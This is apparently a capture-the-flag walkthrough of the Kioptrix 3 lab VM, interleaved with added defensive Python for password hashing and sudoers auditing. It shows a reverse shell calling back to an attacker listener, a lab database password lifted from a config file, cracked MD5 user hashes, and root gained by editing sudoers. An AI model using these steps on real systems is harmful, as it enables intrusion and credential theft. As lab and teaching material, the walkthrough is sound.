root@kali:~# nmap -sS -A 192.168.1.20
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-03 22:04 CET
Nmap scan report for 192.168.1.20
Host is up (0.00062s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:17:F3:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.1.20
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds
I went to the website, and after some navigation I found that it's running the Lotus CMS web application.
I found two exploits on exploit-db. One of them was for Metasploit, which I didn't want to use (although I tried the exploit and it worked), and the other didn't work. I found another one, which is a bash script of the Metasploit version:
It worked really nicely, and I got a reverse shell:
About to try and inject reverse shell....
what IP to use?
192.168.1.17
What PORT?
4444
OK, open your local listener and choose the method for back connect:
1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1
---------------------------
root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.17] from (UNKNOWN) [192.168.1.20] 59701
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
pwd
/home/www/kioptrix3.com
I tried quite a few local privilege escalation exploits, but none of them worked.
I did some further enumeration and found that there is an interesting file which has the SUID bit set (/usr/local/bin/ht).
$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/apache2/suexec
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/local/bin/ht
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/su
However, I couldn't run it from here, because I didn't have full terminal access. I need SSH! Argh...
I moved on to do some further enumeration. In the passwd file I found 2 other normal users (besides root):
root:x:0:0:root:/root:/bin/bash
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
I looked at the webapp configs, hoping I would find a password for the MySQL database on the system. I found it in the gconfig.php file:
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
    echo("A connection to the database couldn't be established: " . mysql_error());
    die();
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
        die();
    }else {
        $settings=mysql_query("select * from gallarific_settings");
        if(mysql_num_rows($settings)!=0){
            while($data=mysql_fetch_array($settings)){
                $GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
            }
        }
    }
}
?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$
I logged in to the database and after browsing the tables, I found passwords for the two users on the machine.
mysql> select * from gallarific_users
select * from gallarific_users
-> ;
;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)
mysql> select * from dev_accounts
select * from dev_accounts
-> ;
;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.00 sec)
mysql>
After doing a Google search I found the passwords for the MD5 hashes:
md5(Mast3r) = 0d3eccfb887aabd50f243b3f155c0f85
md5(starwars) = 5badcaf789d3d1d09794d8f021f40f0e
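The reason a web search could resolve those digests is that dev_accounts stores plain, unsalted MD5: the same input always gives the same 32-hex output, so one published table answers every site that used the scheme. The block below is an added example, not code from the post; it checks the two hashes quoted above against their plaintexts and contrasts them with salted PBKDF2, where two users with the same password get different stored values and verification needs the per-user salt.

```python
import hashlib
import hmac
import os

# The two digests and plaintexts quoted in the post (dev_accounts table).
DEV_ACCOUNTS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}


def md5_hex(password):
    """Unsalted MD5 as the gallery app stored it: no salt, no work factor."""
    return hashlib.md5(password.encode()).hexdigest()


def resolve_unsalted(known_plaintexts):
    """Show why a lookup table works: one md5(word) table maps straight back
    to every account that used that word. Returns {user: plaintext or None}."""
    table = {md5_hex(p): p for p in known_plaintexts}
    return {user: table.get(digest) for user, digest in DEV_ACCOUNTS.items()}


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Stored form: pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>.
    A fresh random salt per user defeats precomputed tables; the iteration
    count makes each guess cost real CPU time."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)
```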
It turned out that both passwords were working on SSH as well. The better account was "loneferret". After logging in I found that it can run the "ht" editor with root privileges.
I could open the shadow file:
But it takes a lot of time to find the password for root. I could open the sudoers file:
This is a very poor editor; it works only in hex, so the simplest thing was to modify the line:
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
to
loneferret ALL=NOPASSWD: /bin/su, /usr/local/bin/ht
That means that I can run the "su" command as well, without a password.
After saving, I could run "sudo su", and I got root access.
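The sudoers line on this box fails in three separate ways: a '!' entry is not a reliable deny (sudoers(5) says so, and an editor running as root can simply rewrite the file), the denied path /usr/bin/su does not even match the real binary at /bin/su from the SUID list above, and granting any editor as root is equivalent to granting root. The following is an added example, not part of the post: a small audit of sudoers user specifications that reports each of those conditions, with the editor and shell names being this example's own assumptions.

```python
import re

# Binaries that give arbitrary file writes or a shell when run as root.
# "ht" is the editor on the Kioptrix box; the others are assumed extras.
EDITORS = {"ht", "vi", "vim", "nano", "emacs"}
SHELLS = {"su", "sh", "bash", "dash"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"   # user  host =
    r"(?:\((?P<runas>[^)]*)\)\s*)?"               # optional (runas)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"                  # NOPASSWD: etc.
    r"(?P<cmds>.+)$"                              # comma-separated commands
)


def parse_rule(line):
    """Split one user specification into its parts; None if not a rule."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return {"user": m.group("user"), "tags": tags, "cmds": cmds}


def audit_rule(line, installed=()):
    """Return (finding, path) pairs for a sudoers line.

    installed: paths of binaries actually present on the host, used to
    check whether a '!' deny entry even names the real binary."""
    rule = parse_rule(line)
    if rule is None:
        return []
    findings = []
    for cmd in rule["cmds"]:
        negated = cmd.startswith("!")
        path = cmd.lstrip("!").split()[0]
        name = path.rsplit("/", 1)[-1]
        if negated:
            # '!' cannot reliably exclude a command; an allowed editor
            # or shell in the same rule reaches the same result anyway.
            findings.append(("ineffective-deny", path))
            if installed and path not in installed:
                findings.append(("deny-wrong-path", path))
            continue
        if name in EDITORS:
            findings.append(("root-file-write", path))
        elif name in SHELLS:
            findings.append(("root-shell", path))
        if "NOPASSWD" in rule["tags"]:
            findings.append(("nopasswd", path))
    return findings
```

Run against the original line with the SUID paths from the find output above as `installed`, it flags the deny as ineffective and mismatched and flags ht as a root file write; the edited line trades the ineffective deny for an outright root shell.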